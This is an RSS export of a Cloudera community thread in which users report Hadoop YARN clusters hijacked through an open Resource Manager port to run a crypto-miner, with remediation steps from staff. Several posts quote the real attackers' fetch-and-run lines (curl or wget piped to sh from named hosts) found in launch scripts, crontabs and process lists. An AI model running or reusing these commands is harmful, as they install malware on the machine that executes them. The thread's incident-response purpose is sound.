<?xml version="1.0" encoding="UTF-8"?>
<rss xmlns:content="http://purl.org/rss/1.0/modules/content/" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#" xmlns:taxo="http://purl.org/rss/1.0/modules/taxonomy/" version="2.0">
  <channel>
    <title>question Re: HDP 2.6.1 Virus CrytalMiner (dr.who) in Support Questions</title>
    <link>https://community.cloudera.com/t5/Support-Questions/HDP-2-6-1-Virus-CrytalMiner-dr-who/m-p/197497#M159548</link>
    <description>&lt;A rel="user" href="https://community.cloudera.com/users/70519/qhuyduong.html" nodeid="70519"&gt;@Huy Duong&lt;/A&gt;&lt;P&gt;We've recently sent out a security notification regarding the same. &lt;/P&gt;&lt;P&gt;&lt;STRONG&gt;&lt;/STRONG&gt;&lt;STRONG&gt;1.&lt;/STRONG&gt; &lt;STRONG&gt;Stop further attacks:&lt;/STRONG&gt;&lt;/P&gt;&lt;P&gt;a. Use Firewall / IP table settings to allow access only to whitelisted IP addresses for Resource Manager port (default 8088). Do this on both Resource Managers in your HA setup. This only addresses the current attack. To permanently secure your clusters, all HDP end-points ( e.g WebHDFS) must be blocked from open access outside of firewalls.&lt;/P&gt;&lt;P&gt;b. Make your cluster secure (kerberized).&lt;/P&gt;&lt;P&gt;&lt;STRONG&gt;2. Clean up existing attacks&lt;/STRONG&gt;:&lt;/P&gt;&lt;P&gt;a. If you already see the above problem in your clusters, please filter all applications named “MYYARN” and kill them after verifying that these applications are not legitimately submitted by your own users.&lt;/P&gt;&lt;P&gt;b. You will also need to manually login into the cluster machines and check for any process with “&lt;EM&gt;&lt;STRONG&gt;z_2.sh&lt;/STRONG&gt;&lt;/EM&gt;” or “&lt;EM&gt;&lt;STRONG&gt;/tmp/java&lt;/STRONG&gt;&lt;/EM&gt;” or “&lt;EM&gt;&lt;STRONG&gt;/tmp/w.conf&lt;/STRONG&gt;&lt;/EM&gt;” and kill them.&lt;/P&gt;&lt;P&gt;Hortonworks strongly recommends affected customers to involve their internal security team to find out the extent of damage and lateral movement inside network. The affected customers will need to do a clean secure installation after backup and ensure that data is not contaminated.&lt;/P&gt;</description>
    <pubDate>Wed, 16 May 2018 20:29:36 GMT</pubDate>
    <dc:creator>sandyy006</dc:creator>
    <dc:date>2018-05-16T20:29:36Z</dc:date>
    <item>
      <title>HDP 2.6.1 Virus CrytalMiner (dr.who)</title>
      <link>https://community.cloudera.com/t5/Support-Questions/HDP-2-6-1-Virus-CrytalMiner-dr-who/m-p/197495#M159546</link>
      <description>&lt;P&gt;Hi!&lt;/P&gt;&lt;P&gt;I'm using HDP 2.6.1. Every ok, but recently, I has problem with Yarn application. I has found type of virus. It work flow:&lt;BR /&gt;1. Some service submit yarn application with user name "dr.who"&lt;/P&gt;&lt;P&gt;2. When submit yarn application, on worker will run script container. Script have malware to download Trojan CrytalMiner.&lt;/P&gt;&lt;P&gt;3. Trojan will run via command: /tmp/java -c /tmp/w.conf.&lt;/P&gt;&lt;P&gt;I has kill job, but it will re-run after about 15 minute. I don't know where submit yarn application with user "dr.who"!, Anybody has same problem?. Please check and show how to remove this!&lt;/P&gt;&lt;P&gt;Many thank!&lt;/P&gt;&lt;P&gt;&lt;span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="74436-virus.png" style="width: 1655px;"&gt;&lt;img src="https://community.cloudera.com/t5/image/serverpage/image-id/17837i95A1683649E298CA/image-size/medium?v=v2&amp;amp;px=400" role="button" title="74436-virus.png" alt="74436-virus.png" /&gt;&lt;/span&gt;&lt;/P&gt;</description>
      <pubDate>Sun, 18 Aug 2019 06:17:24 GMT</pubDate>
      <guid>https://community.cloudera.com/t5/Support-Questions/HDP-2-6-1-Virus-CrytalMiner-dr-who/m-p/197495#M159546</guid>
      <dc:creator>qhuy_duong</dc:creator>
      <dc:date>2019-08-18T06:17:24Z</dc:date>
    </item>
    <item>
      <title>Re: HDP 2.6.1 Virus CrytalMiner (dr.who)</title>
      <link>https://community.cloudera.com/t5/Support-Questions/HDP-2-6-1-Virus-CrytalMiner-dr-who/m-p/197496#M159547</link>
      <description>&lt;P&gt;is this on a public cloud?   Is this an unsecure cluster?&lt;/P&gt;&lt;P&gt;It seems a hacker got in.&lt;/P&gt;&lt;P&gt;You need to secure your YARN.  Dr. Who is anonymous user.    Require passwords, enable kerberos, add Knox, secure your serves.&lt;/P&gt;&lt;P&gt;&lt;A href="http://hadoop.apache.org/docs/r2.8.0/hadoop-project-dist/hadoop-common/SecureMode.html" target="_blank"&gt;http://hadoop.apache.org/docs/r2.8.0/hadoop-project-dist/hadoop-common/SecureMode.html&lt;/A&gt;&lt;/P&gt;&lt;P&gt;hadoop.htttp.staticuser.user = dr. who &lt;/P&gt;&lt;P&gt;it's an internal joke for default user.  you can change it.   it means you have not secure your Hadoop, have an easy password like admin or have a malicious user.&lt;/P&gt;&lt;P&gt;&lt;A href="https://hadoop.apache.org/docs/r2.4.1/hadoop-project-dist/hadoop-common/core-default.xml" target="_blank"&gt;https://hadoop.apache.org/docs/r2.4.1/hadoop-project-dist/hadoop-common/core-default.xml&lt;/A&gt;&lt;/P&gt;&lt;P&gt;&lt;A href="https://www.bleepingcomputer.com/news/security/hadoop-servers-expose-over-5-petabytes-of-data/" target="_blank"&gt;https://www.bleepingcomputer.com/news/security/hadoop-servers-expose-over-5-petabytes-of-data/&lt;/A&gt;&lt;/P&gt;&lt;P&gt;Stop your cluster.   Change your security then restart.   You can then kill all those jobs and no new ones will start.&lt;/P&gt;</description>
      <pubDate>Wed, 16 May 2018 20:05:45 GMT</pubDate>
      <guid>https://community.cloudera.com/t5/Support-Questions/HDP-2-6-1-Virus-CrytalMiner-dr-who/m-p/197496#M159547</guid>
      <dc:creator>TimothySpann</dc:creator>
      <dc:date>2018-05-16T20:05:45Z</dc:date>
    </item>
    <item>
      <title>Re: HDP 2.6.1 Virus CrytalMiner (dr.who)</title>
      <link>https://community.cloudera.com/t5/Support-Questions/HDP-2-6-1-Virus-CrytalMiner-dr-who/m-p/197497#M159548</link>
      <description>&lt;A rel="user" href="https://community.cloudera.com/users/70519/qhuyduong.html" nodeid="70519"&gt;@Huy Duong&lt;/A&gt;&lt;P&gt;We've recently sent out a security notification regarding the same. &lt;/P&gt;&lt;P&gt;&lt;STRONG&gt;&lt;/STRONG&gt;&lt;STRONG&gt;1.&lt;/STRONG&gt; &lt;STRONG&gt;Stop further attacks:&lt;/STRONG&gt;&lt;/P&gt;&lt;P&gt;a. Use Firewall / IP table settings to allow access only to whitelisted IP addresses for Resource Manager port (default 8088). Do this on both Resource Managers in your HA setup. This only addresses the current attack. To permanently secure your clusters, all HDP end-points ( e.g WebHDFS) must be blocked from open access outside of firewalls.&lt;/P&gt;&lt;P&gt;b. Make your cluster secure (kerberized).&lt;/P&gt;&lt;P&gt;&lt;STRONG&gt;2. Clean up existing attacks&lt;/STRONG&gt;:&lt;/P&gt;&lt;P&gt;a. If you already see the above problem in your clusters, please filter all applications named “MYYARN” and kill them after verifying that these applications are not legitimately submitted by your own users.&lt;/P&gt;&lt;P&gt;b. You will also need to manually login into the cluster machines and check for any process with “&lt;EM&gt;&lt;STRONG&gt;z_2.sh&lt;/STRONG&gt;&lt;/EM&gt;” or “&lt;EM&gt;&lt;STRONG&gt;/tmp/java&lt;/STRONG&gt;&lt;/EM&gt;” or “&lt;EM&gt;&lt;STRONG&gt;/tmp/w.conf&lt;/STRONG&gt;&lt;/EM&gt;” and kill them.&lt;/P&gt;&lt;P&gt;Hortonworks strongly recommends affected customers to involve their internal security team to find out the extent of damage and lateral movement inside network. The affected customers will need to do a clean secure installation after backup and ensure that data is not contaminated.&lt;/P&gt;</description>
      <pubDate>Wed, 16 May 2018 20:29:36 GMT</pubDate>
      <guid>https://community.cloudera.com/t5/Support-Questions/HDP-2-6-1-Virus-CrytalMiner-dr-who/m-p/197497#M159548</guid>
      <dc:creator>sandyy006</dc:creator>
      <dc:date>2018-05-16T20:29:36Z</dc:date>
    </item>
    <item>
      <title>Re: HDP 2.6.1 Virus CrytalMiner (dr.who)</title>
      <link>https://community.cloudera.com/t5/Support-Questions/HDP-2-6-1-Virus-CrytalMiner-dr-who/m-p/197498#M159549</link>
      <description>&lt;P&gt;Thanks Sandeep!&lt;/P&gt;&lt;P&gt;I have use firewall block port for yarn resource (8088)!. And all yarn application from user dr.who has gone!&lt;/P&gt;</description>
      <pubDate>Thu, 17 May 2018 09:18:25 GMT</pubDate>
      <guid>https://community.cloudera.com/t5/Support-Questions/HDP-2-6-1-Virus-CrytalMiner-dr-who/m-p/197498#M159549</guid>
      <dc:creator>qhuy_duong</dc:creator>
      <dc:date>2018-05-17T09:18:25Z</dc:date>
    </item>
    <item>
      <title>Re: HDP 2.6.1 Virus CrytalMiner (dr.who)</title>
      <link>https://community.cloudera.com/t5/Support-Questions/HDP-2-6-1-Virus-CrytalMiner-dr-who/m-p/197499#M159550</link>
      <description>&lt;P&gt;Hello!&lt;/P&gt;&lt;P&gt;I has install new cluster. I has firewall all public network. But after install HDP, virus is running, it run via submit task Yarn with Dr.Who user. When submit success, all worker run script to start container, and script malware in this script load this virus to run minning (100%CPU). Please check packages on HDP to verify not has inject malware to project opensource!&lt;/P&gt;&lt;P&gt;It very dangerus!&lt;/P&gt;</description>
      <pubDate>Thu, 12 Jul 2018 15:15:40 GMT</pubDate>
      <guid>https://community.cloudera.com/t5/Support-Questions/HDP-2-6-1-Virus-CrytalMiner-dr-who/m-p/197499#M159550</guid>
      <dc:creator>qhuy_duong</dc:creator>
      <dc:date>2018-07-12T15:15:40Z</dc:date>
    </item>
    <item>
      <title>Re: HDP 2.6.1 Virus CrytalMiner (dr.who)</title>
      <link>https://community.cloudera.com/t5/Support-Questions/HDP-2-6-1-Virus-CrytalMiner-dr-who/m-p/197500#M159551</link>
      <description>&lt;P&gt;This three server host for Virus contact to load:&lt;BR /&gt;193.22.96.25/32&lt;/P&gt;&lt;DIV&gt;176.119.28.11/32
&lt;/DIV&gt;&lt;P&gt;185.222.210.59/32&lt;/P&gt;</description>
      <pubDate>Thu, 12 Jul 2018 15:22:36 GMT</pubDate>
      <guid>https://community.cloudera.com/t5/Support-Questions/HDP-2-6-1-Virus-CrytalMiner-dr-who/m-p/197500#M159551</guid>
      <dc:creator>qhuy_duong</dc:creator>
      <dc:date>2018-07-12T15:22:36Z</dc:date>
    </item>
    <item>
      <title>Re: HDP 2.6.1 Virus CrytalMiner (dr.who)</title>
      <link>https://community.cloudera.com/t5/Support-Questions/HDP-2-6-1-Virus-CrytalMiner-dr-who/m-p/197501#M159552</link>
      <description>&lt;P&gt;
	Hello!&lt;/P&gt;&lt;P&gt;
	I has view log run container and content is:&lt;/P&gt;&lt;PRE&gt;# Creating copy of launch script
cp "launch_container.sh" "/hadoop/yarn/log/application_1531304690787_0086/container_e05_1
531304690787_0086_02_000001/launch_container.sh"
chmod 640 "/hadoop/yarn/log/application_1531304690787_0086/container_e05_1531304690787_00
86_02_000001/launch_container.sh"
# Determining directory contents
echo "ls -l:" 1&amp;gt;"/hadoop/yarn/log/application_1531304690787_0086/container_e05_1531304690
787_0086_02_000001/directory.info"
ls -l 1&amp;gt;&amp;gt;"/hadoop/yarn/log/application_1531304690787_0086/container_e05_1531304690787_008
6_02_000001/directory.info"
echo "find -L . -maxdepth 5 -ls:" 1&amp;gt;&amp;gt;"/hadoop/yarn/log/application_1531304690787_0086/con
tainer_e05_1531304690787_0086_02_000001/directory.info"
find -L . -maxdepth 5 -ls 1&amp;gt;&amp;gt;"/hadoop/yarn/log/application_1531304690787_0086/container_e
05_1531304690787_0086_02_000001/directory.info"
echo "broken symlinks(find -L . -maxdepth 5 -type l -ls):" 1&amp;gt;&amp;gt;"/hadoop/yarn/log/applicati
on_1531304690787_0086/container_e05_1531304690787_0086_02_000001/directory.info"
find -L . -maxdepth 5 -type l -ls 1&amp;gt;&amp;gt;"/hadoop/yarn/log/application_1531304690787_0086/con
tainer_e05_1531304690787_0086_02_000001/directory.info"
echo "Launching container"
exec /bin/bash -c "curl &lt;A href="https://bitbucket.org/fckskid/mygit/raw/master/zz.sh" target="_blank"&gt;https://bitbucket.org/fckskid/mygit/raw/master/zz.sh&lt;/A&gt; | bash"&lt;/PRE&gt;</description>
      <pubDate>Thu, 12 Jul 2018 15:29:36 GMT</pubDate>
      <guid>https://community.cloudera.com/t5/Support-Questions/HDP-2-6-1-Virus-CrytalMiner-dr-who/m-p/197501#M159552</guid>
      <dc:creator>qhuy_duong</dc:creator>
      <dc:date>2018-07-12T15:29:36Z</dc:date>
    </item>
    <item>
      <title>Re: HDP 2.6.1 Virus CrytalMiner (dr.who)</title>
      <link>https://community.cloudera.com/t5/Support-Questions/HDP-2-6-1-Virus-CrytalMiner-dr-who/m-p/197502#M159553</link>
      <description>&lt;P&gt;Just to add few more points on &lt;A href="https://community.hortonworks.com/questions/191898/hdp-261-virus-crytalminer-drwho.html#"&gt;@Sandeep Nemuri&lt;/A&gt;'s reply&lt;/P&gt;&lt;P&gt;You can follow below steps to troubleshoot this issue&lt;/P&gt;&lt;P&gt;a) Stop All the services&lt;/P&gt;&lt;P&gt;b) Verify crontab entries for yarn user &amp;amp; remove all unknown entries&lt;/P&gt;&lt;PRE&gt;$ sudo -u yarn crontab -l&lt;/PRE&gt;&lt;P&gt;In one of the clusters I found below entry in yarn crontab&lt;/P&gt;&lt;PRE&gt;$ sudo -u yarn crontab -l 
* * * * * wget -q -O - &lt;A href="http://46.249.38.186/cr.sh" target="_blank"&gt;http://46.249.38.186/cr.sh&lt;/A&gt; | sh &amp;gt; /dev/null 2&amp;gt;&amp;amp;1 &lt;/PRE&gt;&lt;P&gt;c) Kill all the process with &lt;EM&gt;&lt;STRONG&gt;"/var/tmp/java -c /var/tmp/w.conf"&lt;/STRONG&gt; &lt;/EM&gt;or&lt;STRONG&gt; &lt;EM&gt;"/var/tmp/h.conf"&lt;/EM&gt;&lt;/STRONG&gt;&lt;/P&gt;&lt;P&gt;d) Remove &lt;STRONG&gt;&lt;EM&gt;/var/tmp/java&lt;/EM&gt;&lt;/STRONG&gt; file from all the nodes&lt;/P&gt;&lt;P&gt;e) Restart the cluster via Ambari&lt;/P&gt;&lt;P&gt;Use firewall rules to allow only whitelisted IP addresses .&lt;/P&gt;&lt;P&gt;If you are using Cloud environment, cross check your security group &amp;amp; make sure only whitelisted IP addresses are allowed to make secure connection to your environment.&lt;/P&gt;&lt;P&gt;Secure your cluster with tools like Kerberos, Ranger &amp;amp; Knox to avoid these kind attacks&lt;/P&gt;</description>
      <pubDate>Sat, 04 Aug 2018 02:52:36 GMT</pubDate>
      <guid>https://community.cloudera.com/t5/Support-Questions/HDP-2-6-1-Virus-CrytalMiner-dr-who/m-p/197502#M159553</guid>
      <dc:creator>gul_shad</dc:creator>
      <dc:date>2018-08-04T02:52:36Z</dc:date>
    </item>
    <item>
      <title>Re: HDP 2.6.1 Virus CrytalMiner (dr.who)</title>
      <link>https://community.cloudera.com/t5/Support-Questions/HDP-2-6-1-Virus-CrytalMiner-dr-who/m-p/197503#M159554</link>
      <description>&lt;P&gt;Thanks a lot, &lt;A rel="user" href="https://community.cloudera.com/users/12387/gulshadansari.html" nodeid="12387"&gt;@Gulshad Ansari&lt;/A&gt; and &lt;A rel="user" href="https://community.cloudera.com/users/10159/snemuri.html" nodeid="10159"&gt;@Sandeep Nemuri.&lt;BR /&gt;&lt;/A&gt;&lt;/P&gt;&lt;P&gt;I was struggling with this issue and after spending 2 days I came across to this post. I applied below steps.&lt;/P&gt;&lt;P&gt;1. blocked port 8088 on firewall rules and allowed access to only required IP addresses.&lt;/P&gt;&lt;P&gt;2. killed processed I found with /var/tmp/java -c /var/tmp/w.conf&lt;/P&gt;&lt;P&gt;3. I found a similar entry in crontab at one of our node. I tried to remove it multiple times, but every time it was coming back so I changed the entry to something like below. (I'm not sure whether it is correct way but it started working for me)&lt;/P&gt;&lt;PRE&gt;***** wget -q -O - &lt;A href="http://localhost/xyz.sh" target="_blank"&gt;http://localhost/xyz.sh&lt;/A&gt; &lt;/PRE&gt;&lt;P&gt;These changes are working at my end and the problem got solved. &lt;/P&gt;&lt;P&gt;Kudos to both of you..!!! &lt;/P&gt;</description>
      <pubDate>Thu, 09 Aug 2018 14:00:20 GMT</pubDate>
      <guid>https://community.cloudera.com/t5/Support-Questions/HDP-2-6-1-Virus-CrytalMiner-dr-who/m-p/197503#M159554</guid>
      <dc:creator>dipesh_mywork</dc:creator>
      <dc:date>2018-08-09T14:00:20Z</dc:date>
    </item>
    <item>
      <title>Re: HDP 2.6.1 Virus CrytalMiner (dr.who)</title>
      <link>https://community.cloudera.com/t5/Support-Questions/HDP-2-6-1-Virus-CrytalMiner-dr-who/m-p/197504#M159555</link>
      <description>&lt;P&gt;Hello,&lt;/P&gt;&lt;P&gt;Alright guys, i am facing the same issue and after running crontab command i found &lt;/P&gt;&lt;OL&gt;
&lt;LI&gt;***** wget -q -O - &lt;A href="http://46.249.38.186/cr.sh" target="_blank"&gt;http://46.249.38.186/cr.sh&lt;/A&gt; | sh &amp;gt; /dev/null 2&amp;gt;&amp;amp;1 &lt;/LI&gt;&lt;/OL&gt;&lt;P&gt;But i am not able to find any running java process may be because my resource manager has exited and it is not operational anymore. Beside i did find a java app in /var/tmp folder, so supposedly i should delete it right ?&lt;/P&gt;&lt;P&gt;Second thing my resource manager provides an warning exits "Dr.who has been converted for dr_dot_who" and it cause it to shut down. Just to clear my confusion, i struggled around one week on this still no result and the main point of suspicion was why yarn is running application, beside i didn't not schedule any queue am i right ? or it runs by own ?&lt;/P&gt;&lt;P&gt;Thanks, please reply ASAP&lt;/P&gt;</description>
      <pubDate>Wed, 15 Aug 2018 06:13:38 GMT</pubDate>
      <guid>https://community.cloudera.com/t5/Support-Questions/HDP-2-6-1-Virus-CrytalMiner-dr-who/m-p/197504#M159555</guid>
      <dc:creator>hadoopNoob</dc:creator>
      <dc:date>2018-08-15T06:13:38Z</dc:date>
    </item>
    <item>
      <title>Re: HDP 2.6.1 Virus CrytalMiner (dr.who)</title>
      <link>https://community.cloudera.com/t5/Support-Questions/HDP-2-6-1-Virus-CrytalMiner-dr-who/m-p/197505#M159556</link>
      <description>&lt;P&gt;
	I have encountered this issue by three different types on some of our open clusters.&lt;/P&gt;&lt;P&gt;
	1. Crontab - Already covered in the above post&lt;/P&gt;&lt;P&gt;
	2.Java process - Already covered in the above post&lt;/P&gt;&lt;P&gt;
	3. Yarn process - We have seen this issue here as a process which runs as yarn user and launches container.&lt;/P&gt;&lt;P style="margin-left: 20px;"&gt;&lt;/P&gt;&lt;PRE&gt;#ps -elf

yarn      2239  2238  0 19:56 ?        00:00:00 /bin/bash -c wget &lt;A href="http://178.128.173.178/bins/hoho.x86;chmod" target="_blank"&gt;http://178.128.173.178/bins/hoho.x86;chmod&lt;/A&gt; 777 *;./hoho.x86 Servers
yarn      2248  2239  0 19:56 ?        00:00:00 wget &lt;A href="http://178.128.173.178/bins/hoho.x86" target="_blank"&gt;http://178.128.173.178/bins/hoho.x86&lt;/A&gt;
&lt;/PRE&gt;&lt;P&gt;
	Resolution: Make sure you have correct security groups. Do not open ports to World.&lt;/P&gt;</description>
      <pubDate>Wed, 30 Jan 2019 22:43:02 GMT</pubDate>
      <guid>https://community.cloudera.com/t5/Support-Questions/HDP-2-6-1-Virus-CrytalMiner-dr-who/m-p/197505#M159556</guid>
      <dc:creator>Jay</dc:creator>
      <dc:date>2019-01-30T22:43:02Z</dc:date>
    </item>
    <item>
      <title>Re: HDP 2.6.1 Virus CrytalMiner (dr.who)</title>
      <link>https://community.cloudera.com/t5/Support-Questions/HDP-2-6-1-Virus-CrytalMiner-dr-who/m-p/297136#M218615</link>
      <description>&lt;P&gt;Hi &lt;a href="https://community.cloudera.com/t5/user/viewprofilepage/user-id/61493"&gt;@dipesh_mywork&lt;/a&gt; what do you mean you've blocked the 8088 port of YARN? also what iP's do you included on the whitelist? thanks for your reply! &lt;span class="lia-unicode-emoji" title=":slightly_smiling_face:"&gt;🙂&lt;/span&gt;&lt;/P&gt;</description>
      <pubDate>Wed, 03 Jun 2020 09:55:38 GMT</pubDate>
      <guid>https://community.cloudera.com/t5/Support-Questions/HDP-2-6-1-Virus-CrytalMiner-dr-who/m-p/297136#M218615</guid>
      <dc:creator>Mondi</dc:creator>
      <dc:date>2020-06-03T09:55:38Z</dc:date>
    </item>
    <item>
      <title>Re: HDP 2.6.1 Virus CrytalMiner (dr.who)</title>
      <link>https://community.cloudera.com/t5/Support-Questions/HDP-2-6-1-Virus-CrytalMiner-dr-who/m-p/303300#M221492</link>
      <description>&lt;P&gt;I encountered the same problem last night .tks&lt;/P&gt;</description>
      <pubDate>Thu, 24 Sep 2020 06:57:20 GMT</pubDate>
      <guid>https://community.cloudera.com/t5/Support-Questions/HDP-2-6-1-Virus-CrytalMiner-dr-who/m-p/303300#M221492</guid>
      <dc:creator>petrelli</dc:creator>
      <dc:date>2020-09-24T06:57:20Z</dc:date>
    </item>
    <item>
      <title>Re: HDP 2.6.1 Virus CrytalMiner (dr.who)</title>
      <link>https://community.cloudera.com/t5/Support-Questions/HDP-2-6-1-Virus-CrytalMiner-dr-who/m-p/303304#M221496</link>
      <description>&lt;P&gt;Hi &lt;a href="https://community.cloudera.com/t5/user/viewprofilepage/user-id/81849"&gt;@petrelli&lt;/a&gt;, As this is an older post, you would have a better chance of receiving a resolution by &lt;A href="https://community.cloudera.com/t5/tkb/articleeditorpage/tkb-id/CommunityArticles/html-template-id/1" target="_blank" rel="noopener"&gt;starting a new thread&lt;/A&gt;. This will also be an opportunity to provide details specific to your environment that could aid others in assisting you with a more accurate answer to your question.&lt;/P&gt;</description>
      <pubDate>Thu, 24 Sep 2020 07:47:55 GMT</pubDate>
      <guid>https://community.cloudera.com/t5/Support-Questions/HDP-2-6-1-Virus-CrytalMiner-dr-who/m-p/303304#M221496</guid>
      <dc:creator>K23</dc:creator>
      <dc:date>2020-09-24T07:47:55Z</dc:date>
    </item>
    <item>
      <title>Re: HDP 2.6.1 Virus CrytalMiner (dr.who)</title>
      <link>https://community.cloudera.com/t5/Support-Questions/HDP-2-6-1-Virus-CrytalMiner-dr-who/m-p/338040#M232744</link>
      <description>&lt;P&gt;In my case, the below cron entry was found&lt;/P&gt;&lt;P&gt;&amp;nbsp;&lt;/P&gt;&lt;LI-CODE lang="javascript"&gt;$ sudo  -u yarn crontab -l
*/10 * * * * wget http://vbyphnnymdjnsiau.3utilities.com/Bj2yso0 -O-|sh&lt;/LI-CODE&gt;&lt;P&gt;&amp;nbsp;&lt;/P&gt;&lt;P&gt;It resulted in so many&amp;nbsp;&lt;SPAN&gt;spurious processes initiated by yarn - and shooting up the CPU. Nothing could be done. In some cases the number of entries were as high as 20k.&lt;/SPAN&gt;&lt;/P&gt;&lt;P&gt;&amp;nbsp;&lt;/P&gt;&lt;LI-CODE lang="python"&gt;$ ps -ef | grep yarn
yarn 30321 30318 0 11:44 ? 00:00:00 NHNe5C5iHr
yarn 30323 29152 0 11:44 ? 00:00:00 NHNe5C5iHr
yarn 30330 29075 0 11:44 ? 00:00:00 rxNqqqOesC1HqN
yarn 30427 30319 0 11:44 ? 00:00:00 NHNe5C5iHr
yarn 30773 1 0 10:34 ? 00:00:00 fexsOEvOv
yarn 31186 1 0 10:34 ? 00:00:00 GqOeeG5eCC1rO
yarn 31189 1 0 10:34 ? 00:00:00 ff1NrseqqffTHrve
yarn 31727 1 0 09:20 ? 00:00:00 ivxvj1Ei1
yarn 31731 31727 0 09:20 ? 00:00:04 ivxvj1Ei1
yarn 31770 1 0 09:20 ? 00:00:00 GjN1GxCsqE51fs
yarn 31771 31770 0 09:20 ? 00:00:21 GjN1GxCsqE51fs
yarn 31774 31770 0 09:20 ? 00:00:05 GjN1GxCsqE51fs
yarn 31790 1 0 09:20 ? 00:00:00 EvGeHe5OxfC
yarn 31791 31790 0 09:20 ? 00:00:23 EvGeHe5OxfC
yarn 31793 31790 0 09:20 ? 00:00:02 EvGeHe5OxfC
yarn 31803 1 0 09:20 ? 00:00:00 qCevqvvGff1
yarn 31804 31803 0 09:20 ? 00:00:18 qCevqvvGff1
yarn 31806 31803 0 09:20 ? 00:00:04 qCevqvvGff1
yarn 32243 1 0 10:35 ? 00:00:00 TNsNf5fqTEv5esOxx
yarn 32254 1 0 10:35 ? 00:00:00 qCevqvvGff1
yarn 32255 1 0 10:35 ? 00:00:00 seffjsOExr&lt;/LI-CODE&gt;&lt;P&gt;&amp;nbsp;&lt;/P&gt;&lt;P&gt;Thanks for discussing and bringing up this issue.&lt;/P&gt;</description>
      <pubDate>Wed, 09 Mar 2022 01:06:16 GMT</pubDate>
      <guid>https://community.cloudera.com/t5/Support-Questions/HDP-2-6-1-Virus-CrytalMiner-dr-who/m-p/338040#M232744</guid>
      <dc:creator>vishalaug</dc:creator>
      <dc:date>2022-03-09T01:06:16Z</dc:date>
    </item>
  </channel>
</rss>

